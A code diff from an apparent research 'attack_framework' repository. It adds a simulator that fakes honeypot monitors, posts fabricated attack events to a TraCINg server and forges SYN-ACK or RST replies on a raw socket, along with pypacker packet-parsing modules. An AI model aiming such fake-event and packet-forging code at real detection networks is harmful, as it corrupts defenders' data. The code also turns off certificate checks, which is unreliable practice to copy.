+	def _attack_reaction_cycler(self, procnum, socket_write, queue, requests_session, url_tracing, listening_ips):
+		"""
+		Examines packets in the buffer and reacts on SYN-pings for
+		specific target IPs. Possible reactions are: sending attack
+		events to TraCINg and/or feedback on scanner level
+		"""
+		logger.debug("starting reaction process No. %d" % procnum)
+		cnt = 0
+
+		while True:
+			bts = queue.get()
+
+			try:
+				packet = Ethernet(bts)
+			except:
+				logger.warning("could not parse received packet:\n%r" % bts)
+				store_packets(bts)
+				continue
+			ip_bytes = packet[ip.IP].dst
+
+			# this is a monitor, send event to TraCINg
+			if listening_ips[ip_bytes][1]:
+				cnt += 1
+
+				try:
+					#if packet.body_handler.dst not in listening_ips:
+					#	continue
+
+					p_ip = packet.ip
+					p_tcp = p_ip.tcp
+
+					if cnt % 500 == 0:
+						logger.debug("%d> %d: monitor was scanned: %s:%d -> %s:%d" %
+									(procnum, cnt, p_ip.src_s, p_tcp.sport, p_ip.dst_s, p_tcp.dport))
+
+					"""
+					Inform TraCINg about an attack.
+					"""
+					post_data_dict = {
+								"sensor": {
+									"name": "monitorsimulation_" + packet[ip.IP].dst_s,
+									"type": "Honeypot"},
+								"src": {
+									"ip": packet[ip.IP].src_s,
+									"port": "%d" % packet[tcp.TCP].sport},
+								"dst": {
+									"ip": packet[ip.IP].dst_s,
+									"port": "%d" % packet[tcp.TCP].dport},
+								"type": 11,
+								"log": "Predefined Log",
+								"md5sum": "7867de13bf22a7f3e3559044053e33e7",
+								"date": ("%d" % time.time())
+					}
+
+					#headers = {"Content-type": "application/x-www-form-urlencoded",
+					#	"Accept": "text/plain"}
+
+					post_data = json.dumps(post_data_dict)
+					# logger.debug("POST data:")
+					# logger.debug(post_data)
+					requests_session.post(url=url_tracing, data=post_data, verify=False, stream=False)
+
+					# response = conn.getresponse()
+					#logger.debug(response)
+					#conn = http.client.HTTPSConnection(self._tracing_host, self._tracing_port)
+					#conn.request("POST", self._tracing_path, body=post_data)
+					#logger.warning("attack event sent to TraCINg, monitor: %s" % packet[ip.IP].dst_s)
+				except Exception as ex:
+					logger.warning("could not inform TraCINg: %r" % ex)
+
+			try:
+				responsetype = listening_ips[ip_bytes][0]
+
+				if responsetype == RESPONSETYPE_NONE:
+					continue
+
+				elif responsetype in RESPONSETYPES_TCP:
+					tcp_packet = packet.body_handler.body_handler
+					tcp_packet.ack = tcp_packet.seq + 1
+					tcp_packet.seq = 12345
+					tcp_packet.flags = tcp.TH_SYN | tcp.TH_ACK if responsetype == RESPONSETYPE_TCP_SYNACK else tcp.TH_RST
+					packet.reverse_all_address()
+					#socket_write.send(packet.bin())
+					socket_write.send(packet.bin(update_auto_fields=False))
+				elif responsetype == RESPONSETYPE_ICMP:
+					# TODO: ICMP indicates unreachable hosts, ignore
+					pass
+				else:
+					logger.warning("unknown response type for %s: %r" % (packet.ip.dst_s, responsetype))
+			except Exception as ex:
+				logger.warning("could not send scanner feedback: %r" % ex)
+		logger.debug("reaction cycler is terminating")
+
+if __name__ == "__main__":
+	parser = argparse.ArgumentParser()
+	parser.add_argument("-i", "--interface", help="Interface to listen on", default="eth10")
+	parser.add_argument("-m", "--monitors", help="Amount of monitors to be simulated", type=int, default=1000)
+	parser.add_argument("-r", "--cidrbits", help="CIDR bits of simulated network", type=int, default=0)
+	parser.add_argument("-c", "--cluster", help="Create clustered monitors", type=bool, default=False)
+	parser.add_argument("-f", "--monitorfeedback", help="Probability for monitor feedback", type=float, default=0.9)
+	parser.add_argument("-n", "--nonmonitors", help="Amount of non-monitors to be simulated", type=int, default=0)
+	parser.add_argument("-d", "--nwdrop", help="Probability for network drops", type=float, default=0)
+	parser.add_argument("-b", "--buffersize", help="Buffer to be used for storing received packets", type=int, default=1000000)
+	parser.add_argument("-s", "--seed", help="Seed to be used to distribute nodes", type=int, default=123456789)
+	parser.add_argument("-u", "--url", help="HTTPS URL of TraCINg to send events to", default="https://localhost:443")
+	args = parser.parse_args()
+
+	monitor_ips_init = []
+
+	logger.info("amount of CPUs: %d" % multiprocessing.cpu_count())
+
+	monitorsimulator = MonitorSimulator(
+			amount_monitors=args.monitors,
+			cidr_bits=args.cidrbits,
+			amount_non_monitors=args.nonmonitors,
+			monitor_ips=monitor_ips_init,
+			interface_name=args.interface,
+			buffer_size=args.buffersize,
+			url_tracing=args.url,
+			cluster_monitors=args.cluster,
+			prop_mon_scannerfeedback=args.monitorfeedback,
+			prop_nwdrop=args.nwdrop)
+
+	input("press enter to continue")
+	monitorsimulator.start()
+	print("")
+	user_input = None
+
+	while user_input != "quit":
+		user_input = input("enter 'quit' to quit, 'check' to compare monitors to those in %s\n" % monitorsimulator._file_identified_monitors)
+		if user_input == "check":
+			monitorsimulator.check_matches()
+		else:
+			logger.debug("%d" % monitorsimulator._queue.qsize())
+
+	print("")
+	logger.debug("stopping simulation")
+	monitorsimulator.stop()

+ 0 - 0
attack_framework/pypacker/__init__.py


BIN
attack_framework/pypacker/__pycache__/__init__.cpython-33.pyc


BIN
attack_framework/pypacker/__pycache__/__init__.cpython-34.pyc


BIN
attack_framework/pypacker/__pycache__/checksum.cpython-33.pyc


BIN
attack_framework/pypacker/__pycache__/checksum.cpython-34.pyc


BIN
attack_framework/pypacker/__pycache__/pcapng.cpython-33.pyc


BIN
attack_framework/pypacker/__pycache__/ppcap.cpython-33.pyc


BIN
attack_framework/pypacker/__pycache__/ppcap.cpython-34.pyc


BIN
attack_framework/pypacker/__pycache__/psocket.cpython-33.pyc


BIN
attack_framework/pypacker/__pycache__/psocket.cpython-34.pyc


BIN
attack_framework/pypacker/__pycache__/pypacker.cpython-33.pyc


BIN
attack_framework/pypacker/__pycache__/pypacker.cpython-34.pyc


BIN
attack_framework/pypacker/__pycache__/pypacker_meta.cpython-33.pyc


BIN
attack_framework/pypacker/__pycache__/pypacker_meta.cpython-34.pyc


BIN
attack_framework/pypacker/__pycache__/triggerlist.cpython-33.pyc


BIN
attack_framework/pypacker/__pycache__/triggerlist.cpython-34.pyc


+ 153 - 0
attack_framework/pypacker/checksum.py

@@ -0,0 +1,153 @@
+import array
+import socket
+import struct
+
+# avoid references for performance reasons
+unpack = struct.unpack
+unpack_word_be = struct.Struct(">H").unpack
+array_call = array.array
+ntohs = socket.ntohs
+
+# TCP (RFC 793) and UDP (RFC 768) checksum
+
+
+def in_cksum_add(s, buf):
+	"""Add checksum value to the given value s."""
+	n = len(buf)
+	# logger.debug("buflen for checksum: %d" % n)
+	cnt = int(n / 2) * 2
+	# logger.debug("slicing at: %d, %s" % (cnt, type(cnt)))
+	a = array_call("H", buf[:cnt])
+	# logger.debug("2-byte values: %s" % a)
+	# logger.debug(buf[-1].to_bytes(1, byteorder='big'))
+
+	if cnt != n:
+		#a.append(unpack_word_be( buf[-1].to_bytes(1, byteorder="big") + b"\x00" )[0])
+		a.append(unpack_word_be( buf[-1:] + b"\x00" )[0])
+	return s + sum(a)
+
+
+def in_cksum_done(s):
+	"""Complete checksum building."""
+	# add carry to sum itself
+	s = (s >> 16) + (s & 0xffff)
+	s += (s >> 16)
+	# return complement of sums
+	return ntohs(~s & 0xffff)
+
+
+def in_cksum(buf):
+	"""Return computed Internet Protocol checksum."""
+	return in_cksum_done(in_cksum_add(0, buf))
+
+
+# CRC-32C Checksum
+# http://tools.ietf.org/html/rfc3309
+
+crc32c_table = (
+	0x00000000, 0xF26B8303, 0xE13B70F7, 0x1350F3F4, 0xC79A971F,
+	0x35F1141C, 0x26A1E7E8, 0xD4CA64EB, 0x8AD958CF, 0x78B2DBCC,
+	0x6BE22838, 0x9989AB3B, 0x4D43CFD0, 0xBF284CD3, 0xAC78BF27,
+	0x5E133C24, 0x105EC76F, 0xE235446C, 0xF165B798, 0x030E349B,
+	0xD7C45070, 0x25AFD373, 0x36FF2087, 0xC494A384, 0x9A879FA0,
+	0x68EC1CA3, 0x7BBCEF57, 0x89D76C54, 0x5D1D08BF, 0xAF768BBC,
+	0xBC267848, 0x4E4DFB4B, 0x20BD8EDE, 0xD2D60DDD, 0xC186FE29,
+	0x33ED7D2A, 0xE72719C1, 0x154C9AC2, 0x061C6936, 0xF477EA35,
+	0xAA64D611, 0x580F5512, 0x4B5FA6E6, 0xB93425E5, 0x6DFE410E,
+	0x9F95C20D, 0x8CC531F9, 0x7EAEB2FA, 0x30E349B1, 0xC288CAB2,
+	0xD1D83946, 0x23B3BA45, 0xF779DEAE, 0x05125DAD, 0x1642AE59,
+	0xE4292D5A, 0xBA3A117E, 0x4851927D, 0x5B016189, 0xA96AE28A,
+	0x7DA08661, 0x8FCB0562, 0x9C9BF696, 0x6EF07595, 0x417B1DBC,
+	0xB3109EBF, 0xA0406D4B, 0x522BEE48, 0x86E18AA3, 0x748A09A0,
+	0x67DAFA54, 0x95B17957, 0xCBA24573, 0x39C9C670, 0x2A993584,
+	0xD8F2B687, 0x0C38D26C, 0xFE53516F, 0xED03A29B, 0x1F682198,
+	0x5125DAD3, 0xA34E59D0, 0xB01EAA24, 0x42752927, 0x96BF4DCC,
+	0x64D4CECF, 0x77843D3B, 0x85EFBE38, 0xDBFC821C, 0x2997011F,
+	0x3AC7F2EB, 0xC8AC71E8, 0x1C661503, 0xEE0D9600, 0xFD5D65F4,
+	0x0F36E6F7, 0x61C69362, 0x93AD1061, 0x80FDE395, 0x72966096,
+	0xA65C047D, 0x5437877E, 0x4767748A, 0xB50CF789, 0xEB1FCBAD,
+	0x197448AE, 0x0A24BB5A, 0xF84F3859, 0x2C855CB2, 0xDEEEDFB1,
+	0xCDBE2C45, 0x3FD5AF46, 0x7198540D, 0x83F3D70E, 0x90A324FA,
+	0x62C8A7F9, 0xB602C312, 0x44694011, 0x5739B3E5, 0xA55230E6,
+	0xFB410CC2, 0x092A8FC1, 0x1A7A7C35, 0xE811FF36, 0x3CDB9BDD,
+	0xCEB018DE, 0xDDE0EB2A, 0x2F8B6829, 0x82F63B78, 0x709DB87B,
+	0x63CD4B8F, 0x91A6C88C, 0x456CAC67, 0xB7072F64, 0xA457DC90,
+	0x563C5F93, 0x082F63B7, 0xFA44E0B4, 0xE9141340, 0x1B7F9043,
+	0xCFB5F4A8, 0x3DDE77AB, 0x2E8E845F, 0xDCE5075C, 0x92A8FC17,
+	0x60C37F14, 0x73938CE0, 0x81F80FE3, 0x55326B08, 0xA759E80B,
+	0xB4091BFF, 0x466298FC, 0x1871A4D8, 0xEA1A27DB, 0xF94AD42F,
+	0x0B21572C, 0xDFEB33C7, 0x2D80B0C4, 0x3ED04330, 0xCCBBC033,
+	0xA24BB5A6, 0x502036A5, 0x4370C551, 0xB11B4652, 0x65D122B9,
+	0x97BAA1BA, 0x84EA524E, 0x7681D14D, 0x2892ED69, 0xDAF96E6A,
+	0xC9A99D9E, 0x3BC21E9D, 0xEF087A76, 0x1D63F975, 0x0E330A81,
+	0xFC588982, 0xB21572C9, 0x407EF1CA, 0x532E023E, 0xA145813D,
+	0x758FE5D6, 0x87E466D5, 0x94B49521, 0x66DF1622, 0x38CC2A06,
+	0xCAA7A905, 0xD9F75AF1, 0x2B9CD9F2, 0xFF56BD19, 0x0D3D3E1A,
+	0x1E6DCDEE, 0xEC064EED, 0xC38D26C4, 0x31E6A5C7, 0x22B65633,
+	0xD0DDD530, 0x0417B1DB, 0xF67C32D8, 0xE52CC12C, 0x1747422F,
+	0x49547E0B, 0xBB3FFD08, 0xA86F0EFC, 0x5A048DFF, 0x8ECEE914,
+	0x7CA56A17, 0x6FF599E3, 0x9D9E1AE0, 0xD3D3E1AB, 0x21B862A8,
+	0x32E8915C, 0xC083125F, 0x144976B4, 0xE622F5B7, 0xF5720643,
+	0x07198540, 0x590AB964, 0xAB613A67, 0xB831C993, 0x4A5A4A90,
+	0x9E902E7B, 0x6CFBAD78, 0x7FAB5E8C, 0x8DC0DD8F, 0xE330A81A,
+	0x115B2B19, 0x020BD8ED, 0xF0605BEE, 0x24AA3F05, 0xD6C1BC06,
+	0xC5914FF2, 0x37FACCF1, 0x69E9F0D5, 0x9B8273D6, 0x88D28022,
+	0x7AB90321, 0xAE7367CA, 0x5C18E4C9, 0x4F48173D, 0xBD23943E,
+	0xF36E6F75, 0x0105EC76, 0x12551F82, 0xE03E9C81, 0x34F4F86A,
+	0xC69F7B69, 0xD5CF889D, 0x27A40B9E, 0x79B737BA, 0x8BDCB4B9,
+	0x988C474D, 0x6AE7C44E, 0xBE2DA0A5, 0x4C4623A6, 0x5F16D052,
+	0xAD7D5351
+)
+
+
+def crc32_add(crc, buf):
+	# buf = array.array("B", buf)
+	i = 0
+	while i < len(buf):
+		# crc = (crc >> 8) ^ crc32c_table[(crc ^ b) & 0xff]
+		crc = (crc >> 8) ^ crc32c_table[(crc ^ buf[i]) & 0xff]
+		i += 1
+	return crc
+
+
+def crc32_done(crc):
+	tmp = ~crc & 0xffffffff
+	b0 = tmp & 0xff
+	b1 = (tmp >> 8) & 0xff
+	b2 = (tmp >> 16) & 0xff
+	b3 = (tmp >> 24) & 0xff
+	crc = (b0 << 24) | (b1 << 16) | (b2 << 8) | b3
+	return crc
+
+
+def crc32_cksum(buf):
+	"""Return computed CRC-32c checksum."""
+	return crc32_done(crc32_add(0xffffffff, buf))
+
+
+def fletcher32(data_to_checksum, amount_words):
+	# 1 word = 2 Bytes
+	sum1 = 0xffff
+	sum2 = 0xffff
+	datapos = 0
+
+	while amount_words > 0:
+		tlen = 359 if amount_words > 359 else amount_words
+		amount_words -= tlen
+
+		while tlen > 0:
+			# sum1 += unpack_word_be(data_to_checksum[datapos:datapos+2])[0]
+			# print("%d" % sum1)
+			sum1 += unpack_word_be(data_to_checksum[datapos: datapos + 2])[0]
+			datapos += 2
+			sum2 += sum1
+			# print("%d" % sum1)
+			# print("%d" % sum2)
+			# print("--")
+			tlen -= 1
+		sum1 = (sum1 & 0xffff) + (sum1 >> 16)
+		sum2 = (sum2 & 0xffff) + (sum2 >> 16)
+	# Second reduction step to reduce sums to 16 bits
+	sum1 = (sum1 & 0xffff) + (sum1 >> 16)
+	sum2 = (sum2 & 0xffff) + (sum2 >> 16)
+	return (sum2 << 16) | sum1

+ 0 - 0
attack_framework/pypacker/layer12/__init__.py


BIN
attack_framework/pypacker/layer12/__pycache__/__init__.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/__init__.cpython-34.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/arp.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/arp.cpython-34.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/dtp.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/dtp.cpython-34.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/ethernet.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/ethernet.cpython-34.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/ieee80211.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/linuxcc.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/llc.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/llc.cpython-34.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/ppp.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/ppp.cpython-34.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/pppoe.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/pppoe.cpython-34.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/prism.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/radiotap.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/stp.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/vrrp.cpython-33.pyc


+ 36 - 0
attack_framework/pypacker/layer12/arp.py

@@ -0,0 +1,36 @@
+"""Address Resolution Protocol."""
+
+from pypacker import pypacker
+
+# Hardware address format
+ARP_HRD_ETH	= 0x0001		# ethernet hardware
+ARP_HRD_IEEE802	= 0x0006		# IEEE 802 hardware
+
+# Protocol address format
+ARP_PRO_IP	= 0x0800		# IP protocol
+
+# ARP operation
+ARP_OP_REQUEST		= 1		# request to resolve ha given pa
+ARP_OP_REPLY		= 2		# response giving hardware address
+ARP_OP_REVREQUEST	= 3		# request to resolve pa given ha
+ARP_OP_REVREPLY		= 4		# response giving protocol address
+
+
+class ARP(pypacker.Packet):
+	__hdr__ = (
+		("hrd", "H", ARP_HRD_ETH),
+		("pro", "H", ARP_PRO_IP),
+		("hln", "B", 6),			# hardware address length
+		("pln", "B", 4),			# protocol address length
+		("op", "H", ARP_OP_REQUEST),
+		("sha", "6s", b"\x00" * 6),		# sender mac
+		("spa", "4s", b"\x00" * 6),		# sender ip
+		("tha", "6s", b"\x00" * 6),		# target mac
+		("tpa", "4s", b"\x00" * 6)		# target ip
+	)
+
+	# convenient access
+	sha_s = pypacker.get_property_mac("sha")
+	spa_s = pypacker.get_property_ip4("spa")
+	tha_s = pypacker.get_property_mac("tha")
+	tpa_s = pypacker.get_property_ip4("tpa")

+ 37 - 0
attack_framework/pypacker/layer12/dtp.py

@@ -0,0 +1,37 @@
+"""Dynamic Trunking Protocol."""
+
+from pypacker import pypacker, triggerlist
+
+import struct
+
+TRUNK_NAME	= 0x01
+MAC_ADDR	= 0x04
+
+
+class DTP(pypacker.Packet):
+	__hdr__ = (
+		("v", "B", 0),
+		("tvs", None, triggerlist.TriggerList)
+	)
+
+	def _dissect(self, buf):
+		off = 1
+		dlen = len(buf)
+		tvs = []
+
+		while off < dlen:
+			# length: inclusive header
+			_, l = struct.unpack('>HH', buf[off: off + 4])
+			packet = TV(buf[off: off + l])
+			tvs.append(packet)
+			off += l
+
+		self.tvs.extend(tvs)
+		return 1 + dlen
+
+
+class TV(pypacker.Packet):
+	__hdr__ = (
+		("t", "H", 0),
+		("len", "H", 0)
+	)

+ 189 - 0
attack_framework/pypacker/layer12/ethernet.py

@@ -0,0 +1,189 @@
+"""
+Ethernet II, IEEE 802.3
+
+RFC 1042
+"""
+
+from pypacker import pypacker
+
+import logging
+import struct
+
+# avoid unneeded references for performance reasons
+pack = struct.pack
+unpack = struct.unpack
+
+logger = logging.getLogger("pypacker")
+
+ETH_CRC_LEN	= 4
+ETH_HDR_LEN	= 14
+
+ETH_LEN_MIN	= 64		# minimum frame length with CRC
+ETH_LEN_MAX	= 1518		# maximum frame length with CRC
+
+ETH_MTU		= (ETH_LEN_MAX - ETH_HDR_LEN - ETH_CRC_LEN)
+ETH_MIN		= (ETH_LEN_MIN - ETH_HDR_LEN - ETH_CRC_LEN)
+
+# Ethernet payload types - http://standards.ieee.org/regauth/ethertype
+ETH_TYPE_PUP		= 0x0200		# PUP protocol
+ETH_TYPE_IP		= 0x0800		# IPv4 protocol
+ETH_TYPE_ARP		= 0x0806		# address resolution protocol
+ETH_TYPE_WOL		= 0x0842		# Wake on LAN
+ETH_TYPE_CDP		= 0x2000		# Cisco Discovery Protocol
+ETH_TYPE_DTP		= 0x2004		# Cisco Dynamic Trunking Protocol
+ETH_TYPE_REVARP		= 0x8035		# reverse addr resolution protocol
+ETH_TYPE_ETHTALK	= 0x809B		# Apple Talk
+ETH_TYPE_AARP		= 0x80F3		# Appletalk Address Resolution Protocol
+ETH_TYPE_8021Q		= 0x8100		# IEEE 802.1Q VLAN tagging
+ETH_TYPE_IPX		= 0x8137		# Internetwork Packet Exchange
+ETH_TYPE_NOV		= 0x8138		# Novell
+ETH_TYPE_IP6		= 0x86DD		# IPv6 protocol
+ETH_TYPE_MPLS_UCAST	= 0x8847		# MPLS unicast
+ETH_TYPE_MPLS_MCAST	= 0x8848		# MPLS multicast
+ETH_TYPE_PPOE_DISC	= 0x8863		# PPPoE Discovery
+ETH_TYPE_PPOE_SESS	= 0x8864		# PPPoE Session
+ETH_TYPE_JUMBOF		= 0x8870		# Jumbo Frames
+ETH_TYPE_PROFINET	= 0x8892		# Realtime-Ethernet PROFINET
+ETH_TYPE_ATAOE		= 0x88A2		# ATA other Ethernet
+ETH_TYPE_ETHERCAT	= 0x88A4		# Realtime-Ethernet Ethercat
+ETH_TYPE_PBRIDGE	= 0x88A8		# Provider Briding
+ETH_TYPE_POWERLINK	= 0x88AB		# Realtime Ethernet POWERLINK
+ETH_TYPE_LLDP		= 0x88CC		# Link Layer Discovery Protocol
+ETH_TYPE_SERCOS		= 0x88CD		# Realtime Ethernet SERCOS III
+ETH_TYPE_FIBRE_ETH	= 0x8906		# Fibre Channel over Ethernet
+ETH_TYPE_FCOE		= 0x8914		# FCoE Initialization Protocol (FIP)
+
+ETH_TYPE_LLC		= 0xFFFFF
+
+
+# MPLS label stack fields
+MPLS_LABEL_MASK		= 0xfffff000
+MPLS_QOS_MASK		= 0x00000e00
+MPLS_TTL_MASK		= 0x000000ff
+MPLS_LABEL_SHIFT	= 12
+MPLS_QOS_SHIFT		= 9
+MPLS_TTL_SHIFT		= 0
+MPLS_STACK_BOTTOM	= 0x0100
+
+
+class Ethernet(pypacker.Packet):
+	__hdr__ = (
+		("dst", "6s", b"\xff" * 6),
+		("src", "6s", b"\xff" * 6),
+		("vlan", "4s", None),
+		# ("len", "H", None),
+		("type", "H", ETH_TYPE_IP)		# type = Ethernet II, len = 802.3
+	)
+
+	dst_s = pypacker.get_property_mac("dst")
+	src_s = pypacker.get_property_mac("src")
+
+	def _dissect(self, buf):
+		hlen = 14
+		# we need to check for VLAN TPID here (0x8100) to get correct header-length
+		if buf[12:14] == b"\x81\x00":
+			# logger.debug(">>> got vlan tag")
+			self.vlan = buf[12:16]
+			# logger.debug("re-extracting field: %s" % self.vlan)
+			hlen = 18
+
+		# check for DSAP via length
+		type_len = unpack(">H", buf[12: 14])[0]
+		if type_len < 1536:
+			# assume DSAP is following (802.2 DSAP)
+			# self.len = type_len
+			# deactivate eth_type field
+			# logger.debug(">>> deactivating type")
+			self.type = None
+			self._init_handler(ETH_TYPE_LLC, buf[12: 14])
+			return
+
+		# avoid calling unpack more than once
+		eth_type = unpack(">H", buf[hlen - 2: hlen])[0]
+		# logger.debug("hlen is: %d" % eth_type)
+
+		# handle ethernet-padding: remove it but save for later use
+		# don't use headers for this because this is a rare situation
+		dlen = len(buf) - hlen		# data length [+ padding?]
+
+		try:
+			# this will only work on complete headers: Ethernet + IP + ...
+			# handle padding using IPv4, IPv6
+			# TODO: check for other protocols
+			# logger.debug(">>> checking for padding")
+			if eth_type == ETH_TYPE_IP:
+
+				dlen_ip = unpack(">H", buf[hlen + 2: hlen + 4])[0]		# real data length
+
+				if dlen_ip < dlen:
+					# padding found
+					# logger.debug("got padding for IPv4")
+					self._padding = buf[hlen + dlen_ip:]
+					dlen = dlen_ip
+			# handle padding using IPv6
+			# IPv6 is a piece of sh$§! payloadlength = exclusive standard header, INCLUSIVE options!
+			elif eth_type == ETH_TYPE_IP6:
+				dlen_ip = unpack(">H", buf[hlen + 4: hlen + 6])[0]		# real data length
+				if 40 + dlen_ip < dlen:
+					# padding found
+					# logger.debug("got padding for IPv6")
+					self._padding = buf[hlen + dlen_ip:]
+					dlen = dlen_ip
+		except struct.error:
+			# logger.debug("could not extract padding info, assuming incomplete ethernet frame")
+			pass
+		except:
+			logger.exception("could not extract padding info")
+
+		self._init_handler(eth_type, buf[hlen: hlen + dlen])
+		return hlen
+
+	def bin(self, update_auto_fields=True):
+		"""Custom bin(): handle padding for Ethernet."""
+		return pypacker.Packet.bin(self, update_auto_fields=update_auto_fields) + self.padding
+
+	def __len__(self):
+		return super().__len__() + len(self.padding)
+
+	def direction(self, other):
+		# logger.debug("checking direction: %s<->%s" % (self, other))
+		if self.dst == other.dst and self.src == other.src:
+			# consider packet to itself: can be DIR_REV
+			return pypacker.Packet.DIR_SAME | pypacker.Packet.DIR_REV
+		elif (self.dst == other.src and self.src == other.dst) or\
+			(self.dst == b"\xff\xff\xff\xff\xff\xff" and other.dst == self.src):		# broadcast
+			return pypacker.Packet.DIR_REV
+		else:
+			return pypacker.Packet.DIR_UNKNOWN
+
+	# handle padding attribute
+	def __get_padding(self):
+		try:
+			return self._padding
+		except AttributeError:
+			return b""
+
+	def __set_padding(self, padding):
+		self._padding = padding
+
+	padding = property(__get_padding, __set_padding)
+
+	def reverse_address(self):
+		self.dst, self.src = self.src, self.dst
+
+# load handler
+from pypacker.layer12 import arp, dtp, pppoe, llc
+from pypacker.layer3 import ip, ip6, ipx
+
+pypacker.Packet.load_handler(Ethernet,
+	{
+		ETH_TYPE_IP: ip.IP,
+		ETH_TYPE_ARP: arp.ARP,
+		ETH_TYPE_DTP: dtp.DTP,
+		ETH_TYPE_IPX: ipx.IPX,
+		ETH_TYPE_IP6: ip6.IP6,
+		ETH_TYPE_PPOE_DISC: pppoe.PPPoE,
+		ETH_TYPE_PPOE_SESS: pppoe.PPPoE,
+		ETH_TYPE_LLC: llc.LLC,
+	}
+)

+ 770 - 0
attack_framework/pypacker/layer12/ieee80211.py

@@ -0,0 +1,770 @@
+"""IEEE 802.11"""
+
+from pypacker import pypacker
+from pypacker import triggerlist
+
+import struct
+import logging
+
+logger = logging.getLogger("pypacker")
+
+# Frame Types
+MGMT_TYPE		= 0
+CTL_TYPE		= 1
+DATA_TYPE		= 2
+
+# Frame Sub-Types
+M_ASSOC_REQ		= 0
+M_ASSOC_RESP		= 1
+M_REASSOC_REQ		= 2
+M_REASSOC_RESP		= 3
+M_PROBE_REQ		= 4
+M_PROBE_RESP		= 5
+M_DISASSOC		= 10
+M_AUTH			= 11
+M_DEAUTH		= 12
+M_ACTION		= 13
+M_BEACON		= 8
+M_ATIM			= 9
+
+C_BLOCK_ACK_REQ		= 8
+C_BLOCK_ACK		= 9
+C_PS_POLL		= 10
+C_RTS			= 11
+C_CTS			= 12
+C_ACK			= 13
+C_CF_END		= 14
+C_CF_END_ACK		= 15
+
+D_NORMAL		= 0
+D_DATA_CF_ACK		= 1
+D_DATA_CF_POLL		= 2
+D_DATA_CF_ACK_POLL	= 3
+D_NULL			= 4
+D_CF_ACK		= 5
+D_CF_POLL		= 6
+D_CF_ACK_POLL		= 7
+D_QOS_DATA		= 8
+D_QOS_CF_ACK		= 9
+D_QOS_CF_POLL		= 10
+D_QOS_CF_ACK_POLL	= 11
+D_QOS_NULL		= 12
+D_QOS_CF_POLL_EMPTY	= 14
+
+TO_DS_FLAG		= 10
+FROM_DS_FLAG		= 1
+INTER_DS_FLAG		= 11
+
+# Bitshifts for Frame Control
+_VERSION_MASK		= 0x0300
+_TYPE_MASK		= 0x0c00
+_SUBTYPE_MASK		= 0xf000
+_TO_DS_MASK		= 0x0001
+_FROM_DS_MASK		= 0x0002
+_MORE_FRAG_MASK		= 0x0004
+_RETRY_MASK		= 0x0008
+_PWR_MGT_MASK		= 0x0010
+_MORE_DATA_MASK		= 0x0020
+_PROTECTED_MASK		= 0x0040
+_ORDER_MASK		= 0x0080
+
+_VERSION_SHIFT		= 8
+_TYPE_SHIFT		= 10
+_SUBTYPE_SHIFT		= 12
+_TO_DS_SHIFT		= 0
+_FROM_DS_SHIFT		= 1
+_MORE_FRAG_SHIFT	= 2
+_RETRY_SHIFT		= 3
+_PWR_MGT_SHIFT		= 4
+_MORE_DATA_SHIFT	= 5
+_PROTECTED_SHIFT	= 6
+_ORDER_SHIFT		= 7
+
+
+# needed to distinguish subtypes via types
+TYPE_FACTORS		= [16, 32, 64]
+TYPE_FACTOR_PROTECTED	= 128
+
+
+class IEEE80211(pypacker.Packet):
+	__hdr__ = (
+		# AAAABBCC | 00000000
+		# AAAA = subtype BB = type CC = version
+		("framectl", "H", 0),
+		("duration", "H", 0)
+	)
+
+	def _get_version(self):
+		return (self.framectl & _VERSION_MASK) >> _VERSION_SHIFT
+
+	def _set_version(self, val):
+		self.framectl = (val << _VERSION_SHIFT) | (self.framectl & ~_VERSION_MASK)
+
+	def _get_type(self):
+		return (self.framectl & _TYPE_MASK) >> _TYPE_SHIFT
+
+	def _set_type(self, val):
+		self.framectl = (val << _TYPE_SHIFT) | (self.framectl & ~_TYPE_MASK)
+
+	def _get_subtype(self):
+		return (self.framectl & _SUBTYPE_MASK) >> _SUBTYPE_SHIFT
+
+	def _set_subtype(self, val):
+		self.framectl = (val << _SUBTYPE_SHIFT) | (self.framectl & ~_SUBTYPE_MASK)
+
+	def _get_to_ds(self):
+		return (self.framectl & _TO_DS_MASK) >> _TO_DS_SHIFT
+
+	def _set_to_ds(self, val):
+		self.framectl = (val << _TO_DS_SHIFT) | (self.framectl & ~_TO_DS_MASK)
+
+	def _get_from_ds(self):
+		return (self.framectl & _FROM_DS_MASK) >> _FROM_DS_SHIFT
+
+	def _set_from_ds(self, val):
+		self.framectl = (val << _FROM_DS_SHIFT) | (self.framectl & ~_FROM_DS_MASK)
+
+	def _get_from_to_ds(self):
+		return (self.framectl & (_TO_DS_MASK | _FROM_DS_MASK))
+
+	def _get_more_frag(self):
+		return (self.framectl & _MORE_FRAG_MASK) >> _MORE_FRAG_SHIFT
+
+	def _set_more_frag(self, val):
+		self.framectl = (val << _MORE_FRAG_SHIFT) | (self.framectl & ~_MORE_FRAG_MASK)
+
+	def _get_retry(self):
+		return (self.framectl & _RETRY_MASK) >> _RETRY_SHIFT
+
+	def _set_retry(self, val):
+		self.framectl = (val << _RETRY_SHIFT) | (self.framectl & ~_RETRY_MASK)
+
+	def _get_pwr_mgt(self):
+		return (self.framectl & _PWR_MGT_MASK) >> _PWR_MGT_SHIFT
+
+	def _set_pwr_mgt(self, val):
+		self.framectl = (val << _PWR_MGT_SHIFT) | (self.framectl & ~_PWR_MGT_MASK)
+
+	def _get_more_data(self):
+		return (self.framectl & _MORE_DATA_MASK) >> _MORE_DATA_SHIFT
+
+	def _set_more_data(self, val):
+		self.framectl = (val << _MORE_DATA_SHIFT) | (self.framectl & ~_MORE_DATA_MASK)
+
